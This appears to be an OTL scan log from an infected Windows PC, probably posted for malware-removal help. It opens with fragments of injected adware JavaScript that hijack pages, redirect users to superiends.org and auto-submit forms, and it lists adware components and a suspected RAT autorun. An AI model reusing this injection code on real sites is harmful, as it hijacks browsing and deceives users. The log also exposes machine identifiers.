d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=qdgKrTa9vTY7vTwGfHw9rjaFpjkFrdw%3D&eid=42&hid=16594767138824750826&pid=1160&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;bi;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;iparseInt(\"1.03\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var 
");
FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:9.0.2018.95
FF - prefs.js..extensions.enabledAddons: %7Be4a8a97b-f2ed-450b-b12d-ee082ba24781%7D:2.3
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:34.0.5
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.11.2: C:\Program Files\Java\jre8\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.11.2: C:\Program Files\Java\jre8\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3528.0331: C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@ngm.nexoneu.com/NxGame: C:\ProgramData\NexonEU\NGM\npNxGameEU.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10: C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate)
FF - HKLM\Software\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4: C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (globalUpdate)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\BHP\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\BHP\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-06-12 17:58:35 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\faststartff@gmail.com: C:\Users\BHP\AppData\Roaming\Mozilla\Firefox\Profiles\1jnq2kwm.default\extensions\faststartff@gmail.com
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins
[2014-06-12 17:49:23 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\Extensions
[2015-01-07 14:32:38 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\Firefox\Profiles\1jnq2kwm.default\extensions
[2014-10-29 19:57:38 | 000,304,000 | ---- | M] () (No name found) -- C:\Users\BHP\AppData\Roaming\mozilla\firefox\profiles\1jnq2kwm.default\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi
[2014-12-25 12:31:54 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2014-12-10 20:44:38 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014-06-12 17:58:35 | 000,000,000 | ---D | M] (avast! Online Security) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF

[color=#E56717]========== Chrome ==========[/color]
CHR - default_search_provider: ()
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://istart.webssearches.com/?type=hp&ts=1406196721&from=amt&uid=WDCXWD2500BEVT-11A0RT0_WD-WX50AA95488954889
CHR - default_search_provider: ()
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: 283D5AC53C5E4FCD7CE6E7FB6EAECF5450FBC02D290A017B494D750F5BDD3AFC
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\djeoofodakffcboeiipgjajlfkppplha\3.9\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbddejkiaboppgjbbeljnhdfejceijam\2.2_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkndcbhcgphcfkkddanakjiepeknbgle\1.3.337.3_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\BHP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\

O1 HOSTS File: ([2014-06-19 19:25:07 | 000,000,851 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (TheTorntv V10) - {11111111-1111-1111-1111-110611111177} - C:\Program Files\TheTorntv V10\TheTorntv V10-bho.dll File not found
O2 - BHO: (Ge-Force) - {11111111-1111-1111-1111-110611971195} - C:\Program Files\Ge-Force\Ge-Force-bho.dll (iWebar)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre8\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Cyti Web 1.0.0.6) - {aa2fac44-d24d-4fed-9e32-397d138365f1} - C:\Program Files\Cyti Web\CytiWebBHO.dll File not found
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre8\bin\jp2ssv.dll (Oracle Corporation)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [mbot_pl_4] File not found
O4 - HKLM..\Run: [snpstd] C:\Windows\vsnpstd.exe ()
O4 - HKLM..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe (Nullsoft, Inc.)
O4 - HKLM..\Run: [Wireless Console 3] C:\Program Files\ASUS\Wireless Console 3\wcourier.exe ()
O4 - HKLM..\Run: [YTDownloader] "C:\Program Files\YTDownloader\YTDownloader.exe" /boot File not found
O4 - HKCU..\Run: [Akamai NetSession Interface] "C:\Users\BHP\AppData\Local\Akamai\netsession_win.exe" File not found
O4 - HKCU..\Run: [Facebook Update] C:\Users\BHP\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKCU..\Run: [Internet Manager] C:\Program Files\T-Mobile\InternetManager_H\Internet Manager.exe ()
O4 - HKCU..\Run: [MicroUpdate] C:\Users\BHP\Documents\MSDCSC\msdcsc.exe File not found
O4 - HKCU..\Run: [PriceMeterW] "C:\Users\BHP\AppData\Local\PriceMeter\pricemeterw.exe" File not found
O4 - HKCU..\Run: [screenSHU] C:\Program Files\screenSHU\screenSHU.exe ()
O4 - HKCU..\Run: [Steam] C:\Program Files\Steam\steam.exe (Valve Corporation)
O4 - HKCU..\Run: [YTDownloader] "C:\Program Files\YTDownloader\YTDownloader.exe" /boot File not found
O4 - Startup: C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tworzenie wycinków ekranu i uruchamianie programu OneNote 2010.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O8 - Extra context menu item: E&ksportuj do programu Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Wyślij &do programu OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Wyślij do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Wyślij &do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: &Notatki połączone programu OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Notatki połączone programu OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13 - gopher Prefix: missing
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{140DD688-FDE0-4937-9A18-3A9767765AC4}: NameServer = 193.41.112.14 193.41.112.18
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1599A17F-54A1-4BEE-B94C-674327D45F4F}: NameServer = 193.41.112.18 193.41.112.14
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{1CD2CE1E-2B79-4D01-8001-AB0279002EC9}: NameServer = 193.41.112.18 193.41.112.14
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{963A9DEA-72DC-4777-93DD-DB8E8F8C17EC}: DhcpNameServer = 192.168.0.1
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20 - AppInit_DLLs: (c:\progra~1\pc_boo~1\assist~1.dll) - File not found
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009-06-10 22:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O33 - MountPoints2\{81935d64-f304-11e3-b519-74f06dbd7a85}\Shell - "" = AutoRun
O33 - MountPoints2\{81935d64-f304-11e3-b519-74f06dbd7a85}\Shell\AutoRun\command - "" = E:\AutoRun.exe
O33 - MountPoints2\{81935d85-f304-11e3-b519-74f06dbd7a85}\Shell - "" = AutoRun
O33 - MountPoints2\{81935d85-f304-11e3-b519-74f06dbd7a85}\Shell\AutoRun\command - "" = F:\AutoRun.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O34 - HKLM BootExecute: (aswBoot.exe /M:14c3ddcb973 /dir:"C:\Program Files\AVAST Software\Avast")
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]
[2015-01-07 14:45:01 | 001,115,648 | ---- | C] (Farbar) -- C:\Users\BHP\Desktop\FRST.exe
[2015-01-07 14:44:44 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\BHP\Desktop\OTL.exe
[2015-01-06 22:16:24 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Enigma Software Group
[2015-01-06 22:16:19 | 000,000,000 | ---D | C] -- C:\Users\BHP\Start Menu
[2015-01-06 22:16:05 | 000,000,000 | ---D | C] -- C:\sh4ldr
[2015-01-06 22:14:44 | 000,000,000 | ---D | C] -- C:\Program Files\Enigma Software Group
[2015-01-06 22:08:45 | 000,000,000 | ---D | C] -- C:\Program Files\Ge-Force
[2015-01-06 21:38:16 | 000,043,152 | ---- | C] (StdLib) -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys
[2015-01-06 21:30:23 | 000,000,000 | ---D | C] -- C:\Program Files\Cyti Web
[2015-01-06 21:27:55 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\Installer
[2015-01-06 21:15:31 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\ShopperPro
[2015-01-06 21:15:23 | 000,000,000 | ---D | C] -- C:\Program Files\ShopperPro
[2015-01-06 21:15:11 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\CrashRpt
[2014-12-30 15:52:45 | 000,000,000 | ---D | C] -- C:\MSDCSC
[2014-12-27 17:40:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PicoZip
[2014-12-27 17:40:36 | 000,000,000 | ---D | C] -- C:\Program Files\PicoZipRT
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RAR Password Recovery
[2014-12-27 17:34:19 | 000,000,000 | ---D | C] -- C:\Program Files\Intelore
[2014-12-27 11:43:40 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Don't Starve v1.115739
[2014-12-22 10:29:51 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\FLT
[2014-12-22 10:29:32 | 000,000,000 | ---D | C] -- C:\Users\BHP\Documents\Klei
[2014-12-18 16:04:06 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014-12-16 17:52:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014-12-16 17:52:59 | 000,000,000 | ---D | C] -- C:\Program Files\LogMeIn Hamachi
[2014-12-15 21:46:49 | 000,661,272 | ---- | C] (TMRG, Inc.) -- C:\Windows\System32\rlls.dll
[2014-12-15 17:10:34 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
[2014-12-15 17:10:32 | 000,000,000 | ---D | C] -- C:\Program Files\WarThunder
[2014-12-13 10:03:48 | 000,000,000 | ---D | C] -- C:\Windows\System32\appraiser
[2014-12-12 15:21:48 | 003,209,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mf.dll
[2014-12-12 15:21:48 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mfps.dll
[2014-12-12 15:21:48 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\rrinstaller.exe
[2014-12-12 15:21:48 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mfpmp.exe
[2014-12-12 15:21:48 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mferror.dll
[2014-12-11 13:00:58 | 001,160,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aitstatic.exe
[2014-12-11 13:00:58 | 000,873,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aeinv.dll
[2014-12-11 13:00:58 | 000,728,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\appraiser.dll
[2014-12-11 13:00:58 | 000,159,744 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aepic.dll
[2014-12-11 13:00:57 | 000,610,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\invagent.dll
[2014-12-11 13:00:57 | 000,337,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\generaltel.dll
[2014-12-11 13:00:57 | 000,315,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\devinv.dll
[2014-12-11 13:00:56 | 000,202,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\aepdu.dll
[2014-12-11 13:00:47 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe
[2014-12-11 13:00:47 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll
[2014-12-11 13:00:47 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll
[2014-12-11 13:00:46 | 000,667,648 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe
[2014-12-11 13:00:46 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll
[2014-12-11 13:00:46 | 000,418,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll
[2014-12-11 13:00:46 | 000,047,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll
[2014-12-11 13:00:46 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll
[2014-12-11 13:00:44 | 000,285,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll
[2014-12-11 13:00:43 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll
[2014-12-11 13:00:41 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll
[2014-12-11 13:00:41 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll
[2014-12-11 13:00:39 | 004,299,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll
[2014-12-11 13:00:36 | 000,684,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe
[2014-12-11 13:00:36 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll
[2014-12-11 13:00:34 | 000,342,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll
[2014-12-11 13:00:33 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll
[2014-12-11 13:00:33 | 000,688,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll
[2014-12-11 13:00:32 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[2014-12-11 13:00:31 | 002,052,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl
[2014-12-11 13:00:31 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll
[2014-12-11 13:00:30 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll
[2014-12-11 12:54:23 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\tzres.dll
[2014-12-11 12:53:23 | 000,155,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\charmap.exe
[2014-12-11 12:52:55 | 000,248,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WSManMigrationPlugin.dll
[2014-12-11 12:52:55 | 000,214,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WsmWmiPl.dll
[2014-12-11 12:52:55 | 000,198,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WSManHTTPConfig.exe
[2014-12-11 12:52:55 | 000,145,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WsmAuto.dll
[2014-12-08 21:19:02 | 000,000,000 | ---D | C] -- C:\Users\BHP\AppData\Local\Eclipse
[2014-12-08 20:21:53 | 000,000,000 | ---D | C] -- C:\Users\BHP\Documents\Visual Studio 2013
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]
[2015-01-07 14:45:38 | 000,380,416 | ---- | M] () -- C:\Users\BHP\Desktop\yz2k5433.exe
[2015-01-07 14:45:05 | 001,115,648 | ---- | M] (Farbar) -- C:\Users\BHP\Desktop\FRST.exe
[2015-01-07 14:44:48 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\BHP\Desktop\OTL.exe
[2015-01-07 14:42:00 | 000,001,446 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-7.job
[2015-01-07 14:41:00 | 000,001,030 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015-01-07 14:14:40 | 000,022,336 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015-01-07 14:14:40 | 000,022,336 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015-01-07 14:08:12 | 000,005,820 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-6.job
[2015-01-07 14:08:03 | 000,000,930 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015-01-07 14:03:56 | 000,000,892 | ---- | M] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job
[2015-01-07 14:03:44 | 000,000,920 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3408851026-3105934659-272300781-1001UA.job
[2015-01-07 14:03:41 | 000,002,748 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5_user.job
[2015-01-07 14:03:39 | 000,002,748 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-5.job
[2015-01-07 14:03:37 | 000,005,476 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-7.job
[2015-01-07 14:03:31 | 000,003,742 | ---- | M] () -- C:\Windows\tasks\4a263a02-ae51-4b9a-a531-2037e520e833-1.job
[2015-01-07 14:03:25 | 000,002,146 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-4.job
[2015-01-07 14:03:25 | 000,001,510 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-6.job
[2015-01-07 14:03:25 | 000,001,506 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-1.job
[2015-01-07 14:03:25 | 000,001,438 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-5_user.job
[2015-01-07 14:03:25 | 000,001,424 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-5.job
[2015-01-07 14:03:25 | 000,001,298 | ---- | M] () -- C:\Windows\tasks\798c9d1a-d35a-41a7-b128-4763313e6ae1-2.job
[2015-01-07 14:03:02 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015-01-06 22:16:19 | 000,001,240 | ---- | M] () -- C:\Users\BHP\Desktop\SpyHunter.lnk
[2015-01-06 22:14:56 | 000,019,984 | ---- | M] () -- C:\Windows\System32\drivers\EsgScanner.sys
[2015-01-06 22:13:01 | 000,000,888 | ---- | M] () -- C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job
[2015-01-06 22:06:09 | 000,001,026 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015-01-06 22:06:09 | 000,000,342 | ---- | M] () -- C:\Windows\tasks\DriverToolkit Autorun.job
[2015-01-06 19:16:04 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3408851026-3105934659-272300781-1001Core.job
[2015-01-06 06:43:12 | 000,043,152 | ---- | M] (StdLib) -- C:\Windows\System32\drivers\{f69f75dd-7e74-4885-b8d1-87b7e0b79ccb}Gw.sys
[2015-01-03 14:14:38 | 2299,817,984 | -HS- | M] () -- C:\hiberfil.sys
